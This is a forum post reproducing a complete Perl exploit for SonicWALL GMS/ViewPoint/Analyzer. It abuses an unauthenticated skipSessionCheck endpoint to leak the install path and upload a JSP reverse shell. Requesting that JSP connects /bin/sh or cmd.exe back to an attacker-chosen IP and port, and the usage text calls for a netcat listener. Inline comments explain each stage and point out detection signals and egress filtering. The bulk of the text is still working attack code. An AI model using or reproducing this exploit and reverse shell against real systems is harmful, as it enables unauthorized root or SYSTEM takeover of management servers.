



حامد کیانمهر
21st January 2013, 16:43
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM Exploit



#!/usr/bin/perl







##






# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit





# Name: sgmsRCE.pl





# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>





#





# Use it only for education or ethical pentesting! The author accepts





# no liability for damage caused by this tool.





#





##

















use strict;





use HTTP::Request::Common qw(POST);





use LWP::UserAgent;





use LWP::Protocol::https;





use Getopt::Std;

















# Command-line handling via Getopt::Std::getopt(): every letter in the
# spec string takes a value; any other single-letter switch (here -d) is
# accepted as a bare boolean.  NOTE: the trailing ':' is getopts()-style
# syntax and carries no meaning for getopt() -- harmless but misleading.
# NOTE: the file enables 'use strict' but not 'use warnings', so the
# undef comparisons further down stay silent.
my %args;





getopt('hlp:', \%args);











# -h is the base URL of the management interface.  A missing -h prints the
# usage text and exits; the value itself is never validated and is
# interpolated into request URLs as given.
my $victim = $args{h} || usage();





# -l / -p are the callback address and port that the generated JSP will
# connect back to.  They are not checked for presence: an undef value is
# interpolated into the JSP source unchanged.
my $lip = $args{l};





my $lport = $args{p};





# -d: detection-only mode; the upload/trigger stage below is skipped.
my $detect = $args{d};





# Fixed name of the JSP payload, both for the local temp file and for the
# file dropped into the appliance webapp directory.  A constant filename
# is a simple indicator: this name appearing under Tomcat/webapps/appliance/
# on a GMS host is a strong sign the tool was run against it.
my $shellname = "cbs.jsp";











banner();











# Filled in by the detection stage: the install root scraped from the
# diagnostics page, later extended to the Tomcat webapp directory.
my $gms_path;





# "UNX" or "WIN", decided from the leading character of $gms_path.
my $target;





# Command interpreter the JSP launches: /bin/sh or cmd.exe.
my $sysshell;











# verify_hostname => 0 turns off TLS hostname verification, so a
# self-signed or mismatched appliance certificate does not stop the
# requests.  The User-Agent is set to a desktop Firefox string, so
# UA-based filtering on the appliance will not single this tool out;
# the request shape (see the POST bodies below) is the better signal.
my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);





$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");











# Place your Proxy here if needed (routes both http and https through it).





#$agent->proxy(['http', 'https'], 'http://localhost:8080/');











# Stage 1 -- detection probe.  A POST to the appliance main page with
# skipSessionCheck=1 asks the diagnostics handler to search the
# application log.  No session cookie is sent.  A 2xx response alone is
# reported as "looks vulnerable"; the decisive check is whether the HTML
# contains the install path (parsed in the next section).
# Detection: match on the path /appliance/applianceMainPage with
# skipSessionCheck=1 in the query and action=show_diagnostics&task=search
# in the body, arriving without an established session.
print "[+] Checking host ...\n";





my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",





Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',





Content => [ num => "123456",





action => "show_diagnostics",





task => "search",





item => "application_log",





criteria => "*.*",





width => "500",





];











my $result = $agent->request($request);











if ($result->is_success) {





print "[+] Host looks vulnerable ...\n";





} else {





# NOTE: method calls are not interpolated in double-quoted strings; this
# prints the stringified object followed by the literal text
# "->status_line", not the HTTP status.
print "[-] Error while connecting ... $result->status_line\n";





exit(0);





}

















# Stage 2 -- scrape the install path.  The diagnostics page lists log
# files in <OPTION VALUE="..."> elements; the text preceding "logs" in the
# first matching value is taken as the GMS install root.
my @lines=split("\n",$result->content);











foreach my $line (@lines) {





if ($line =~ /OPTION VALUE=/) {





# Split on double quotes; $a[1] is the attribute value.  It is undef when
# the line carries no quotes (silent here because warnings are off).
my @a=split("\"", $line);





if ($a[1] =~ m/logs/i) {





my @b=split(/logs/i,$a[1]);





$gms_path=$b[0];





}





# Stop at the first path found.  $gms_path is still undef when nothing
# matched; the string comparison treats undef as "" and moves on.
if ($gms_path ne "") {





print "[+] GMS Path: $gms_path\n";





last;





} else {





next;





}





}





}





# Without a path there is no target directory for the upload stage.
if ($gms_path eq "") {





print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";





exit(0);





}

















# Stage 3 -- pick the platform from the path shape: a leading "/" means
# Unix, anything else is assumed to be a Windows drive path.  The install
# root is extended to the Tomcat webapp directory of the "appliance"
# application, which is the directory the JSP is written into so that it
# becomes reachable as /appliance/<name>.  Monitoring that directory for
# new .jsp files is a direct detection point for this stage.
if ($gms_path =~ m/^\//) {





$target="UNX";





$gms_path=$gms_path."Tomcat/webapps/appliance/";





$sysshell="/bin/sh";





# "ist" is a typo in the user-facing text (left unchanged).
print "[+] Target ist Unix...\n";





} else {





$target="WIN";





$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";





$sysshell="cmd.exe";





print "[+] Target ist Windows...\n";





}











# Writes the JSP payload to the local working directory (see
# _writing_shell below).  NOTE: the &name; call form passes the current
# @_ through to the sub; harmless here because the sub ignores @_.
&_writing_shell;











# Stage 4 -- upload and trigger (skipped with -d).  The same session-less
# endpoint exposes a file-system handler: task=uploadFile with
# searchFolder pointing at the webapp directory writes the JSP onto the
# appliance, and a plain GET of that JSP is what the script treats as
# "shell spawned".
# Detection: a multipart POST to applianceMainPage?skipSessionCheck=1
# with action=file_system&task=uploadFile and a searchFolder under
# Tomcat/webapps, followed shortly by a GET for a .jsp under /appliance/.
# Mitigation side: the JSP opens an OUTBOUND TCP connection from the
# appliance to -l/-p, so egress filtering from the management host breaks
# this stage even if the upload succeeds.
if (!$detect) {





print "[+] Uploading shell ...\n";





my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",





Content_Type => 'multipart/form-data',





Content => [ action => "file_system",





task => "uploadFile",





# Remote directory the server writes the uploaded part into.
searchFolder => "$gms_path",





# HTTP::Request::Common file-upload form: the LOCAL file named
# $shellname is read and sent as the part body.
uploadFileName => ["$shellname"]





];











my $result = $agent->request($request);











if ($result->is_success) {





print "[+] Upload completed ...\n";





} else {





# NOTE: "$result->status_line" does not call the method; it prints the
# stringified object plus the literal text "->status_line".
print "[-] Error while connecting ... $result->status_line\n";





exit(0);





}











# Remove the local copy of the JSP once it has been sent.
unlink("$shellname");











# A successful GET only means the page was served; whether the connection
# back to -l/-p actually happened is not observable from here.
print "[+] Spawning remote root/system shell ...\n";





my $result = $agent->get("$victim/appliance/$shellname");











if ($result->is_success) {





print "[+] Have fun ...\n";





} else {





# NOTE: same non-interpolated method call as above.
print "[-] Error while connecting ... $result->status_line\n";





exit(0);





}





}











# Writes the JSP payload to $shellname in the current directory.  Three
# globals are interpolated into the Java source: $lip and $lport (the
# callback address) and $sysshell (the interpreter).  Nothing is escaped,
# so a value containing a double quote would produce invalid Java.
# What the generated page does when executed by Tomcat: it opens a TCP
# socket to $lip:$lport, starts $sysshell, and runs two StreamConnector
# threads that copy the process's stdout to the socket and the socket's
# input to the process's stdin.  Every exception is swallowed, so a
# blocked egress connection fails silently on the appliance side and the
# page still returns 200 to the caller.
# Inside the heredoc, \@ escapes the array sigil so that "@page" is
# emitted literally.
sub _writing_shell {





# Bareword (package-global) filehandle; the die message omits the file
# name.  Ignores @_.
open FILE, ">", "$shellname" or die $!;





print FILE << "EOF";





<%\@page import="java.lang.*"%>





<%\@page import="java.util.*"%>





<%\@page import="java.io.*"%>





<%\@page import="java.net.*"%>





<%





class StreamConnector extends Thread





{





InputStream is;





OutputStream os;











StreamConnector( InputStream is, OutputStream os )





{





this.is = is;





this.os = os;





}





public void run()





{





BufferedReader in = null;





BufferedWriter out = null;





try





{





in = new BufferedReader( new InputStreamReader( this.is ) );





out = new BufferedWriter( new OutputStreamWriter( this.os ) );





char buffer[] = new char[8192];





int length;





while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )





{





out.write( buffer, 0, length );





out.flush();





}





} catch( Exception e ){}





try





{





if( in != null )





in.close();





if( out != null )





out.close();





} catch( Exception e ){}





}





}





try





{





Socket socket = new Socket( "$lip", $lport );





Process process = Runtime.getRuntime().exec( "$sysshell" );





( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();





( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();





} catch( Exception e ) {}





%>











EOF











# Return value of close() is not checked; a short write would go unnoticed.
close(FILE);





}











# Prints the usage text to STDOUT and exits with status 1.  Called when -h
# is missing (usage() is the right-hand side of the || in the -h
# assignment), so it never returns.  Ignores @_.
sub usage {





print "\n";





print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";





# The stray space in the rule line is in the original text (left as is).
print "================================================== ==================\n\n";





print " Usage:\n";





print " $0 -h <http://victim> -l <yourip> -p <yourport>\n";





print " Notes:\n";





print " Start your netcat listener <nc -lp 4444>\n";





print " -d only checks if the Host is vulnerable\n";





print "\n";





print " Author:\n";





print " Nikolas Sotiriu (lofi)\n";





print " url: www.sotiriu.de\n";





print " mail: lofi[at]sotiriu.de\n";





print "\n";

















exit(1);





}











# Prints the title banner to STDERR (so it does not mix with the STDOUT
# status lines).  The heredoc body, including its blank lines, is emitted
# verbatim.  Ignores @_.
sub banner {





print STDERR << "EOF";





--------------------------------------------------------------------------------





SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit





--------------------------------------------------------------------------------











EOF



}